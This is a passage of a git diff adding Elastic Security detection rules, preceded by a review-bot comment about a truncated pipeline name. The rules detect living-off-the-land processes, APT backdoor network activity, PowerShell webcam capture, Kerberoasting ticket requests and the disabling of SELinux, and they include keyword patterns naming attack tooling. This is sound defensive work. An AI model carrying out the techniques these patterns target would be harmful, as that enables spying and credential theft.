a/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_4.json b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_4.json new file mode 100644 index 00000000000..f07070f56fa --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ea09ff26-3902-4c53-bb8e-24b7a5d029dd_4.json 
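Review bot: The ingest pipeline name quoted in the `setup` text of this hunk, `-problem_child_ingest_pipeline`, begins with a bare hyphen, which looks like a version or template prefix was lost during export; a user who copies it into `winlogbeat.yml` as instructed would reference a pipeline that does not exist. Confirm the installed pipeline's name against the problemchild package and spell it out in full, e.g. `<problemchild-package-version>-problem_child_ingest_pipeline` (placeholder). In the same paragraph, `Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html)` is missing the markdown link brackets and should read `[Winlogbeat](https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html)`. The same text recurs in the ea09ff26-3902-4c53-bb8e-24b7a5d029dd_4.json hunk that follows, whose end is outside this chunk, so the fix applies to both files.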
@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_parent", + "name": "Unusual Process Spawned by a Parent Process", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "ea09ff26-3902-4c53-bb8e-24b7a5d029dd", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. 
Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "ea09ff26-3902-4c53-bb8e-24b7a5d029dd_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_1.json b/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_1.json new file mode 100644 index 00000000000..d76bee38a99 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_1.json 
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious network events executed by the APT package manager, potentially indicating persistence through an APT backdoor. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious APT Package Manager Network Connection", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.parent.name == \"apt\" and process.args == \"-c\" and process.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n )\n ] by process.entity_id\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eaef8a35-12e0-4ac0-bc14-81c72b6bd27c", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 1 + }, + "id": "eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_1", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_2.json b/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_2.json new file mode 100644 index 00000000000..4a08a5d888e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_2.json 
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious network events executed by the APT package manager, potentially indicating persistence through an APT backdoor. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious APT Package Manager Network Connection", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.parent.name == \"apt\" and process.args == \"-c\" and process.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n )\n ] by process.entity_id\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eaef8a35-12e0-4ac0-bc14-81c72b6bd27c", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 2 + }, + "id": "eaef8a35-12e0-4ac0-bc14-81c72b6bd27c_2", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_3.json b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_3.json new file mode 100644 index 00000000000..e77f861946e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_3.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can be used to record webcam video. Attackers can capture this information to extort or spy on victims.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Webcam Video Capture Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"NewFrameEventHandler\" or\n \"VideoCaptureDevice\" or\n \"DirectX.Capture.Filters\" or\n \"VideoCompressors\" or\n \"Start-WebcamRecorder\" or\n (\n (\"capCreateCaptureWindowA\" or\n \"capCreateCaptureWindow\" or\n \"capGetDriverDescription\") and\n (\"avicap32.dll\" or \"avicap32\")\n )\n )\n", + "references": [ + "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/collection/WebcamRecorder.py" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "eb44611f-62a8-4036-a5ef-587098be6c43", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + 
"Tactic: Collection", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1125", + "name": "Video Capture", + "reference": "https://attack.mitre.org/techniques/T1125/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "eb44611f-62a8-4036-a5ef-587098be6c43_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_4.json b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_4.json new file mode 100644 index 00000000000..48011719ead --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb44611f-62a8-4036-a5ef-587098be6c43_4.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that can be used to record webcam video. Attackers can capture this information to extort or spy on victims.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Webcam Video Capture Capabilities", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"NewFrameEventHandler\" or\n \"VideoCaptureDevice\" or\n \"DirectX.Capture.Filters\" or\n \"VideoCompressors\" or\n \"Start-WebcamRecorder\" or\n (\n (\"capCreateCaptureWindowA\" or\n \"capCreateCaptureWindow\" or\n \"capGetDriverDescription\") and\n (\"avicap32.dll\" or \"avicap32\")\n )\n )\n", + "references": [ + "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/collection/WebcamRecorder.py" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "eb44611f-62a8-4036-a5ef-587098be6c43", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: 
Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1125", + "name": "Video Capture", + "reference": "https://attack.mitre.org/techniques/T1125/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "eb44611f-62a8-4036-a5ef-587098be6c43_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_111.json b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_111.json new file mode 100644 index 00000000000..b348b59162d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb610e70-f9e6-4949-82b9-f1c5bcd37c39_111.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects PowerShell scripts that have the capability of requesting kerberos tickets, which is a common step in Kerberoasting toolkits to crack service accounts.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Kerberos Ticket Request", + "note": "## Triage and analysis\n\n### Investigating PowerShell Kerberos Ticket Request\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available for use in various environments, creating an attractive way for attackers to execute code.\n\nAccounts associated with a service principal name (SPN) are viable targets for Kerberoasting attacks, which use brute force to crack the user password, which is used to encrypt a Kerberos TGS ticket.\n\nAttackers can use PowerShell to request these Kerberos tickets, with the intent of extracting them from memory to perform Kerberoasting.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate if the script was executed, and if so, which account was targeted.\n- Validate if the account has an SPN associated with it.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Check if the script has any other functionality that can be potentially malicious.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Review event ID [4769](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4769) related to this account and service name for additional information.\n\n### False positive analysis\n\n- A possible false positive can be identified if the script content is not malicious/harmful or does not request Kerberos tickets for user accounts, as computer accounts are not vulnerable to Kerberoasting due to complex password requirements and policy.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. 
Prioritize privileged accounts.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n KerberosRequestorSecurityToken\n ) and not user.id : (\"S-1-5-18\" or \"S-1-5-20\") and\n not powershell.file.script_block_text : (\n (\"sentinelbreakpoints\" and (\"Set-PSBreakpoint\" or \"Set-HookFunctionTabs\")) or\n (\"function global\" and \"\\\\windows\\\\sentinel\\\\4\")\n )\n", + "references": [ + "https://cobalt.io/blog/kerberoast-attack-techniques", + "https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + 
"Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/", + "subtechnique": [ + { + "id": "T1558.003", + "name": "Kerberoasting", + "reference": "https://attack.mitre.org/techniques/T1558/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 111 + }, + "id": "eb610e70-f9e6-4949-82b9-f1c5bcd37c39_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_108.json b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_108.json new file mode 100644 index 00000000000..66468d2dc1f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/eb9eb8ba-a983-41d9-9c93-a1c05112ca5e_108.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Disabling of SELinux", + "query": "process where host.os.type == \"linux\" and event.type in (\"start\", \"process_started\") and\nprocess.name == \"setenforce\" and process.args == \"0\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "eb9eb8ba-a983-41d9-9c93-a1c05112ca5e", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
